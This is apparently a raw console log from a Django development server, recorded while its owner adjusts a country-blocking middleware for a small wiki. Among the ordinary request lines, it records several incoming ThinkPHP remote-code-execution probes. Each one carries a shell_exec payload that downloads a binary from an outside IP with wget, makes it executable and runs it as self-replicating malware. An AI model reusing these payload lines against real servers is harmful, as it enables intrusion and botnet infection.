Forbidden: /
[05/Jun/2023 09:39:11] "GET / HTTP/1.1" 403 13
Forbidden: /
[05/Jun/2023 09:39:13] "GET / HTTP/1.1" 403 13
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:39:56
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Forbidden: /
[05/Jun/2023 09:39:57] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 09:39:58] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 09:39:58] "GET / HTTP/1.1" 403 11
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:42:52
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Forbidden: /
[05/Jun/2023 09:42:55] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 09:42:57] "GET / HTTP/1.1" 403 11
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Forbidden: /
Forbidden: /
[05/Jun/2023 09:44:35] "GET / HTTP/1.1" 403 11
[05/Jun/2023 09:44:35] "GET / HTTP/1.1" 403 11
Forbidden: /
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:44:36
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Internal Server Error: /
Traceback (most recent call last):
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\core\handlers\exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
TypeError: 'CountryRestrictionMiddleware' object is not callable
[05/Jun/2023 09:44:36] "GET / HTTP/1.1" 500 52303
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:45:28
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

[05/Jun/2023 09:45:29] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 09:45:36] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 09:45:38] "GET / HTTP/1.1" 200 2210
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:45:41
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Forbidden: /
[05/Jun/2023 09:45:42] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 09:45:43] "GET / HTTP/1.1" 403 11
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:45:54
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

[05/Jun/2023 09:45:55] "GET / HTTP/1.1" 200 2210
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:47:41
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Forbidden: /
[05/Jun/2023 09:47:42] "GET / HTTP/1.1" 403 13
Forbidden: /favicon.ico
[05/Jun/2023 09:47:43] "GET /favicon.ico HTTP/1.1" 403 13
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 09:48:38
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

[05/Jun/2023 09:48:41] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 09:48:41] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://164.68.115.154/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1")
[05/Jun/2023 09:48:41] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://164.68.115.154/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 -
Not Found: /favicon.ico
[05/Jun/2023 09:48:41] "GET /favicon.ico HTTP/1.1" 404 3130
[05/Jun/2023 09:48:44] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 09:48:45] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 09:48:47] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 09:48:49] "GET / HTTP/1.1" 200 2210
Invalid HTTP_HOST header: '192.168.0.7'. You may need to add '192.168.0.7' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\core\handlers\exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\utils\deprecation.py", line 133, in __call__
    response = self.process_request(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\middleware\common.py", line 48, in process_request
    host = request.get_host()
           ^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\http\request.py", line 150, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: '192.168.0.7'. You may need to add '192.168.0.7' to ALLOWED_HOSTS.
Bad Request: /
[05/Jun/2023 09:49:20] "GET / HTTP/1.1" 400 66414
Invalid HTTP_HOST header: '192.168.0.7'. You may need to add '192.168.0.7' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\core\handlers\exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\utils\deprecation.py", line 133, in __call__
    response = self.process_request(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\middleware\common.py", line 48, in process_request
    host = request.get_host()
           ^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\http\request.py", line 150, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: '192.168.0.7'. You may need to add '192.168.0.7' to ALLOWED_HOSTS.
Bad Request: /favicon.ico
[05/Jun/2023 09:49:21] "GET /favicon.ico HTTP/1.1" 400 66276
[05/Jun/2023 09:49:29] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 200 4196
[05/Jun/2023 09:49:40] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 200 4196
[05/Jun/2023 09:52:05,587] - Broken pipe from ('118.235.27.46', 26538)
Invalid HTTP_HOST header: 'ipinfo.io:443'. You may need to add 'ipinfo.io' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\core\handlers\exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\utils\deprecation.py", line 133, in __call__
    response = self.process_request(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\middleware\common.py", line 48, in process_request
    host = request.get_host()
           ^^^^^^^^^^^^^^^^^^
  File "C:\Users\aaaa\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\django\http\request.py", line 150, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'ipinfo.io:443'. You may need to add 'ipinfo.io' to ALLOWED_HOSTS.
Bad Request: /ipinfo.io:443
[05/Jun/2023 09:53:58] "CONNECT ipinfo.io:443 HTTP/1.1" 400 65242
[05/Jun/2023 10:01:46] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 10:02:50] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.131.111.241/Shinji.x86 -O /tmp/.SHINJI; chmod 777 /tmp/.SHINJI; /tmp/.SHINJI thinkphp.selfrep' HTTP/1.1")
[05/Jun/2023 10:02:50] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.131.111.241/Shinji.x86 -O /tmp/.SHINJI; chmod 777 /tmp/.SHINJI; /tmp/.SHINJI thinkphp.selfrep' HTTP/1.1" 400 -
[05/Jun/2023 10:07:42] "GET / HTTP/1.1" 200 2210
[05/Jun/2023 10:07:46] "GET / HTTP/1.1" 200 2210
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 10:12:09
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 10:12:15] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 10:12:24] "GET / HTTP/1.1" 403 13
Forbidden: /
[05/Jun/2023 10:12:47] "GET / HTTP/1.1" 403 13
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 10:23:58
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 10:24:09] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 11
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 10:24:38
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

[05/Jun/2023 10:24:42] "GET / HTTP/1.1" 200 2210
C:\Users\aaaa\Desktop\wiki\wiki\middleware.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
June 05, 2023 - 10:24:48
Django version 4.2.1, using settings 'wiki.settings'
Starting development server at http://192.168.0.7:80/
Quit the server with CTRL-BREAK.

[05/Jun/2023 10:49:11] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://192.210.162.147/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1")
[05/Jun/2023 10:49:11] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://192.210.162.147/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1" 400 -
Not Found: /favicon.ico
[05/Jun/2023 11:00:07] "GET /favicon.ico HTTP/1.1" 404 3130
[05/Jun/2023 11:03:14,799] - Broken pipe from ('118.235.27.46', 30930)
[05/Jun/2023 11:08:29] "GET /wiki/sc%E2%80%AAience1-1 HTTP/1.1" 200 5570
[05/Jun/2023 11:13:30,960] - Broken pipe from ('118.235.27.46', 48824)
[05/Jun/2023 11:44:42] code 400, message Bad request version ('À\x14À')
[05/Jun/2023 11:44:42] You're accessing the development server over HTTPS, but it only supports HTTP.
[05/Jun/2023 11:55:07] code 400, message Bad request version ('À\x14À')
[05/Jun/2023 11:55:07] You're accessing the development server over HTTPS, but it only supports HTTP.
Forbidden: /
[05/Jun/2023 11:55:22] "GET / HTTP/1.1" 403 13
Forbidden: /favicon.ico
[05/Jun/2023 11:55:24] "GET /favicon.ico HTTP/1.1" 403 13
Forbidden: /robots.txt
[05/Jun/2023 11:55:26] "GET /robots.txt HTTP/1.1" 403 13
Forbidden: /sitemap.xml
[05/Jun/2023 11:55:30] "GET /sitemap.xml HTTP/1.1" 403 13
[05/Jun/2023 12:21:48] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://IPHERE/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1")
[05/Jun/2023 12:21:48] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://IPHERE/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 -
[05/Jun/2023 12:29:10] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://164.68.115.154/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1")
[05/Jun/2023 12:29:10] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://164.68.115.154/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 -
Forbidden: /
[05/Jun/2023 13:12:40] "GET / HTTP/1.1" 403 14
Forbidden: /
[05/Jun/2023 13:49:51] "GET / HTTP/1.1" 403 11
Forbidden: /favicon.ico
[05/Jun/2023 13:49:51] "GET /favicon.ico HTTP/1.1" 403 11
Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 13:49:55] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 11
Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 13:59:42] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 14:04:17] "GET / HTTP/1.1" 403 12
Forbidden: /
[05/Jun/2023 14:05:42] "GET / HTTP/1.1" 403 14
Forbidden: /geoserver/web/
[05/Jun/2023 14:06:07] "GET /geoserver/web/ HTTP/1.1" 403 12
Forbidden: /
[05/Jun/2023 14:12:32] "GET / HTTP/1.1" 403 14
Forbidden: /
[05/Jun/2023 14:26:54] "GET / HTTP/1.1" 403 12
Forbidden: /
[05/Jun/2023 14:39:07] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 14:41:51] "GET / HTTP/1.1" 403 13
Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 14:43:24] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 14:44:41] "GET / HTTP/1.1" 403 14
Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 14:52:12] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 13
Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 14:52:14] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 13
Forbidden: /Autodiscover/Autodiscover.xml
[05/Jun/2023 14:54:16] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 403 11
Forbidden: /wiki/07 대칭키 암호
[05/Jun/2023 14:55:23] "GET /wiki/07%20%EB%8C%80%EC%B9%AD%ED%82%A4%20%EC%95%94%ED%98%B8 HTTP/1.1" 403 13
[05/Jun/2023 15:03:35] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://164.68.115.154/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1")
[05/Jun/2023 15:03:35] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://164.68.115.154/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 -
[05/Jun/2023 15:05:23] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://135.148.104.21/bins/x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1")
[05/Jun/2023 15:05:23] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://135.148.104.21/bins/x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1" 400 -
Forbidden: /
[05/Jun/2023 15:16:38] "GET / HTTP/1.1" 403 14
[05/Jun/2023 15:23:03] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://206.189.20.35/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1")
[05/Jun/2023 15:23:03] "GET /index.php?s=/index/        hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://206.189.20.35/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 -
Forbidden: /
[05/Jun/2023 15:38:15] "GET / HTTP/1.1" 403 11
Forbidden: /favicon.ico
[05/Jun/2023 15:38:16] "GET /favicon.ico HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:38:30] "GET / HTTP/1.1" 403 11
Forbidden: /favicon.ico
[05/Jun/2023 15:38:31] "GET /favicon.ico HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:38:32] "GET / HTTP/1.1" 403 11
Forbidden: /favicon.ico
[05/Jun/2023 15:38:33] "GET /favicon.ico HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:38:35] "GET / HTTP/1.1" 403 11
Forbidden: /favicon.ico
[05/Jun/2023 15:38:36] "GET /favicon.ico HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:38:42] "GET / HTTP/1.1" 403 11
Forbidden: /favicon.ico
[05/Jun/2023 15:38:43] "GET /favicon.ico HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:38:46] "GET / HTTP/1.1" 403 13
Forbidden: /
[05/Jun/2023 15:38:58] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:38:59] "GET / HTTP/1.1" 403 11
Forbidden: /
[05/Jun/2023 15:41:21] "GET / HTTP/1.1" 403 14
Forbidden: /
[05/Jun/2023 15:48:57] "GET / HTTP/1.1" 403 11
